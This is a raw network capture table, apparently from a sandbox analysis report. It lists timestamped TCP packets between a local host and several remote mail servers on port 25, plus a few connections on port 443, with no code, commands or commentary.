Feb 20, 2023 09:51:29.900732994 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:29.902410984 CET	49718	25	192.168.2.5	91.136.8.41
Feb 20, 2023 09:51:29.947993040 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:29.958970070 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:29.960691929 CET	49718	25	192.168.2.5	91.136.8.41
Feb 20, 2023 09:51:30.006613970 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:30.006963015 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:30.007050037 CET	49718	25	192.168.2.5	91.136.8.41
Feb 20, 2023 09:51:30.645056009 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.645104885 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.645204067 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.646308899 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.646332979 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.759481907 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.759577990 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.761763096 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.761780977 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.762211084 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.763279915 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.763298988 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.763365030 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.763375998 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.763557911 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.763567924 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.795344114 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.795456886 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:30.795537949 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.796144962 CET	49720	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:30.796174049 CET	443	49720	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:32.056163073 CET	25	49717	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:32.056204081 CET	25	49717	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:32.056375980 CET	49717	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:32.058640957 CET	49717	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:32.080986023 CET	25	49717	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:33.060818911 CET	25	49719	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:33.060868979 CET	25	49719	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:33.060997009 CET	49719	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:33.063514948 CET	49719	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:33.085549116 CET	25	49719	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:33.574757099 CET	49721	25	192.168.2.5	104.47.0.36
Feb 20, 2023 09:51:33.615530014 CET	25	49721	104.47.0.36	192.168.2.5
Feb 20, 2023 09:51:33.615710020 CET	49721	25	192.168.2.5	104.47.0.36
Feb 20, 2023 09:51:33.658761978 CET	25	49721	104.47.0.36	192.168.2.5
Feb 20, 2023 09:51:33.662868977 CET	49721	25	192.168.2.5	104.47.0.36
Feb 20, 2023 09:51:33.705238104 CET	25	49721	104.47.0.36	192.168.2.5
Feb 20, 2023 09:51:33.711350918 CET	49721	25	192.168.2.5	104.47.0.36
Feb 20, 2023 09:51:33.753253937 CET	25	49721	104.47.0.36	192.168.2.5
Feb 20, 2023 09:51:33.754165888 CET	49721	25	192.168.2.5	104.47.0.36
Feb 20, 2023 09:51:33.797024012 CET	25	49721	104.47.0.36	192.168.2.5
Feb 20, 2023 09:51:33.808585882 CET	49721	25	192.168.2.5	104.47.0.36
Feb 20, 2023 09:51:33.848862886 CET	25	49721	104.47.0.36	192.168.2.5
Feb 20, 2023 09:51:33.851145983 CET	25	49721	104.47.0.36	192.168.2.5
Feb 20, 2023 09:51:33.851234913 CET	49721	25	192.168.2.5	104.47.0.36
Feb 20, 2023 09:51:33.927542925 CET	49722	25	192.168.2.5	104.47.22.161
Feb 20, 2023 09:51:33.969737053 CET	25	49722	104.47.22.161	192.168.2.5
Feb 20, 2023 09:51:33.969926119 CET	49722	25	192.168.2.5	104.47.22.161
Feb 20, 2023 09:51:34.013381004 CET	25	49722	104.47.22.161	192.168.2.5
Feb 20, 2023 09:51:34.021087885 CET	49722	25	192.168.2.5	104.47.22.161
Feb 20, 2023 09:51:34.040411949 CET	49723	25	192.168.2.5	104.47.56.161
Feb 20, 2023 09:51:34.063108921 CET	25	49722	104.47.22.161	192.168.2.5
Feb 20, 2023 09:51:34.063779116 CET	25	49722	104.47.22.161	192.168.2.5
Feb 20, 2023 09:51:34.072011948 CET	49722	25	192.168.2.5	104.47.22.161
Feb 20, 2023 09:51:34.114300966 CET	25	49722	104.47.22.161	192.168.2.5
Feb 20, 2023 09:51:34.115331888 CET	25	49722	104.47.22.161	192.168.2.5
Feb 20, 2023 09:51:34.116111040 CET	25	49722	104.47.22.161	192.168.2.5
Feb 20, 2023 09:51:34.116198063 CET	49722	25	192.168.2.5	104.47.22.161
Feb 20, 2023 09:51:34.133810043 CET	49722	25	192.168.2.5	104.47.22.161
Feb 20, 2023 09:51:34.176248074 CET	25	49722	104.47.22.161	192.168.2.5
Feb 20, 2023 09:51:34.207972050 CET	25	49723	104.47.56.161	192.168.2.5
Feb 20, 2023 09:51:34.208218098 CET	49723	25	192.168.2.5	104.47.56.161
Feb 20, 2023 09:51:34.377424002 CET	25	49723	104.47.56.161	192.168.2.5
Feb 20, 2023 09:51:34.395956993 CET	49723	25	192.168.2.5	104.47.56.161
Feb 20, 2023 09:51:34.456834078 CET	49724	25	192.168.2.5	67.195.228.86
Feb 20, 2023 09:51:34.563534021 CET	25	49723	104.47.56.161	192.168.2.5
Feb 20, 2023 09:51:34.564126015 CET	25	49723	104.47.56.161	192.168.2.5
Feb 20, 2023 09:51:34.572721004 CET	49723	25	192.168.2.5	104.47.56.161
Feb 20, 2023 09:51:34.619427919 CET	25	49724	67.195.228.86	192.168.2.5
Feb 20, 2023 09:51:34.620107889 CET	49724	25	192.168.2.5	67.195.228.86
Feb 20, 2023 09:51:34.740380049 CET	25	49723	104.47.56.161	192.168.2.5
Feb 20, 2023 09:51:34.741441965 CET	25	49723	104.47.56.161	192.168.2.5
Feb 20, 2023 09:51:34.742310047 CET	25	49723	104.47.56.161	192.168.2.5
Feb 20, 2023 09:51:34.742410898 CET	49723	25	192.168.2.5	104.47.56.161
Feb 20, 2023 09:51:34.755453110 CET	49723	25	192.168.2.5	104.47.56.161
Feb 20, 2023 09:51:34.923103094 CET	25	49723	104.47.56.161	192.168.2.5
Feb 20, 2023 09:51:34.936278105 CET	25	49724	67.195.228.86	192.168.2.5
Feb 20, 2023 09:51:34.938730955 CET	49724	25	192.168.2.5	67.195.228.86
Feb 20, 2023 09:51:35.065560102 CET	49725	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:35.092505932 CET	25	49725	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:35.094403028 CET	49725	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:35.101711035 CET	25	49724	67.195.228.86	192.168.2.5
Feb 20, 2023 09:51:35.101767063 CET	25	49724	67.195.228.86	192.168.2.5
Feb 20, 2023 09:51:35.104974985 CET	49724	25	192.168.2.5	67.195.228.86
Feb 20, 2023 09:51:35.125971079 CET	25	49725	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:35.129157066 CET	49725	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:35.156133890 CET	25	49725	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:35.161576986 CET	25	49725	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:35.169476986 CET	49725	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:35.200258017 CET	25	49725	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:35.277276039 CET	25	49724	67.195.228.86	192.168.2.5
Feb 20, 2023 09:51:35.277314901 CET	25	49724	67.195.228.86	192.168.2.5
Feb 20, 2023 09:51:35.277460098 CET	49724	25	192.168.2.5	67.195.228.86
Feb 20, 2023 09:51:35.375567913 CET	49725	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:35.597049952 CET	49725	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:35.601887941 CET	49724	25	192.168.2.5	67.195.228.86
Feb 20, 2023 09:51:35.628679037 CET	25	49725	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:35.634453058 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:35.637880087 CET	25	49725	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:35.652314901 CET	49725	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:35.682991028 CET	25	49725	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:35.686153889 CET	49725	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:35.764448881 CET	25	49724	67.195.228.86	192.168.2.5
Feb 20, 2023 09:51:35.828165054 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:35.830732107 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:36.325037956 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:36.334969044 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:36.528692007 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:36.583745956 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:36.625602961 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:37.003529072 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:37.197086096 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:37.200748920 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:37.229650021 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:37.464909077 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:37.504888058 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:37.550198078 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:37.743678093 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:37.751765013 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:37.797678947 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:38.379306078 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:38.404007912 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:38.531388044 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:38.597563028 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:38.598030090 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:38.772749901 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:38.773715019 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:38.791409969 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:38.936208010 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:38.969075918 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:38.969372034 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.025273085 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.100644112 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.129779100 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.130944967 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.162786961 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.218831062 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.220381021 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.294112921 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.295567989 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.324311972 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.325392962 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.415049076 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.416503906 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.489177942 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.490555048 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.520482063 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.521488905 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.610038042 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.610337019 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.684621096 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.686455011 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.715759993 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.716206074 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.771743059 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.807080984 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.808056116 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.876408100 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.879868031 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.880851984 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.909712076 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.910605907 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.965517998 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:39.966329098 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:39.967129946 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.002918005 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.003657103 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.053225040 CET	49730	25	192.168.2.5	185.253.212.68
Feb 20, 2023 09:51:40.069931984 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.071542978 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.074196100 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.074444056 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.099253893 CET	25	49730	185.253.212.68	192.168.2.5
Feb 20, 2023 09:51:40.104053974 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.105062962 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.160800934 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.162437916 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.197108984 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.197983980 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.265057087 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.266618967 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.267843962 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.267982006 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.298628092 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.299743891 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.356115103 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.357841969 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.391505957 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.392410040 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.457573891 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.460165977 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.460982084 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.461275101 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.461400032 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.493374109 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.494422913 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:40.551409006 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.585797071 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.610368967 CET	49730	25	192.168.2.5	185.253.212.68
Feb 20, 2023 09:51:40.651668072 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.654365063 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.654637098 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:40.656240940 CET	25	49730	185.253.212.68	192.168.2.5
Feb 20, 2023 09:51:40.687939882 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:41.057471991 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:41.058681011 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:41.252024889 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:41.252438068 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:41.252470016 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:41.252523899 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:41.253309965 CET	49727	25	192.168.2.5	44.238.161.41
Feb 20, 2023 09:51:41.297903061 CET	49730	25	192.168.2.5	185.253.212.68
Feb 20, 2023 09:51:41.344082117 CET	25	49730	185.253.212.68	192.168.2.5
Feb 20, 2023 09:51:41.446753025 CET	25	49727	44.238.161.41	192.168.2.5
Feb 20, 2023 09:51:41.580873966 CET	49733	25	192.168.2.5	185.253.212.68
Feb 20, 2023 09:51:41.624730110 CET	25	49733	185.253.212.68	192.168.2.5
Feb 20, 2023 09:51:42.075963974 CET	49736	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:42.207375050 CET	25	49736	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:42.210781097 CET	49736	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:42.298132896 CET	49733	25	192.168.2.5	185.253.212.68
Feb 20, 2023 09:51:42.321137905 CET	49737	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:42.343506098 CET	25	49733	185.253.212.68	192.168.2.5
Feb 20, 2023 09:51:42.343807936 CET	25	49736	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:42.348028898 CET	49736	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:42.478874922 CET	25	49736	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:42.510844946 CET	49736	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:42.642715931 CET	25	49736	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:42.644954920 CET	49736	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:42.776335001 CET	25	49736	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:42.796621084 CET	49736	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:42.907409906 CET	49733	25	192.168.2.5	185.253.212.68
Feb 20, 2023 09:51:42.926899910 CET	25	49736	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:42.928088903 CET	25	49736	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:42.928271055 CET	49736	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:42.951754093 CET	25	49733	185.253.212.68	192.168.2.5
Feb 20, 2023 09:51:43.145804882 CET	49739	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:43.467123985 CET	49742	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:51:43.494097948 CET	25	49742	142.250.27.26	192.168.2.5
Feb 20, 2023 09:51:43.494206905 CET	49742	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:51:43.531063080 CET	25	49742	142.250.27.26	192.168.2.5
Feb 20, 2023 09:51:43.534295082 CET	49742	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:51:43.560992956 CET	25	49742	142.250.27.26	192.168.2.5
Feb 20, 2023 09:51:43.565829039 CET	25	49742	142.250.27.26	192.168.2.5
Feb 20, 2023 09:51:43.572882891 CET	49742	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:51:43.602392912 CET	25	49742	142.250.27.26	192.168.2.5
Feb 20, 2023 09:51:43.605799913 CET	49742	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:51:43.638087034 CET	25	49742	142.250.27.26	192.168.2.5
Feb 20, 2023 09:51:43.643843889 CET	25	49742	142.250.27.26	192.168.2.5
Feb 20, 2023 09:51:43.664856911 CET	49742	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:51:43.694461107 CET	25	49742	142.250.27.26	192.168.2.5
Feb 20, 2023 09:51:43.694681883 CET	49742	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:51:43.817171097 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:43.852591038 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:43.852803946 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:45.407685041 CET	49737	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:45.546787024 CET	49749	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:51:45.982573032 CET	49750	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:46.122786045 CET	25	49750	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:46.123119116 CET	49750	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:46.255558014 CET	49752	25	192.168.2.5	96.47.154.206
Feb 20, 2023 09:51:46.264519930 CET	25	49750	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:46.267020941 CET	49739	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:46.268250942 CET	49750	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:46.408895969 CET	25	49750	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:46.416143894 CET	49750	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:46.557121992 CET	25	49750	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:46.595773935 CET	49750	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:46.737107038 CET	25	49750	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:46.750667095 CET	49750	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:46.890804052 CET	25	49750	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:46.892085075 CET	25	49750	104.47.57.110	192.168.2.5
Feb 20, 2023 09:51:46.892271996 CET	49750	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:51:47.000824928 CET	49753	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:51:47.250849962 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:47.262778044 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:47.292987108 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:47.295485020 CET	49754	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:47.671082973 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:47.677561998 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:47.707722902 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:47.894862890 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:47.898283958 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:47.928556919 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.085091114 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.107474089 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.149951935 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.301218987 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.301937103 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.336044073 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.337393999 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.367876053 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.368413925 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.399202108 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.399852037 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.435336113 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.435877085 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.466051102 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.500792980 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.500845909 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.500957012 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.502933979 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.502968073 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.575562954 CET	49749	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:51:48.585184097 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.605797052 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.605906010 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.609241009 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.609270096 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.609663963 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.611838102 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.611865997 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.611959934 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.611973047 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.612238884 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.612255096 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.615303040 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.615711927 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.642431021 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.642549992 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.642744064 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.643013000 CET	49756	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:48.643054008 CET	443	49756	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:48.647098064 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.647824049 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.678999901 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.679702997 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.711796045 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.712743044 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.743005037 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.744087934 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.785725117 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.786602020 CET	49745	25	192.168.2.5	165.227.159.144
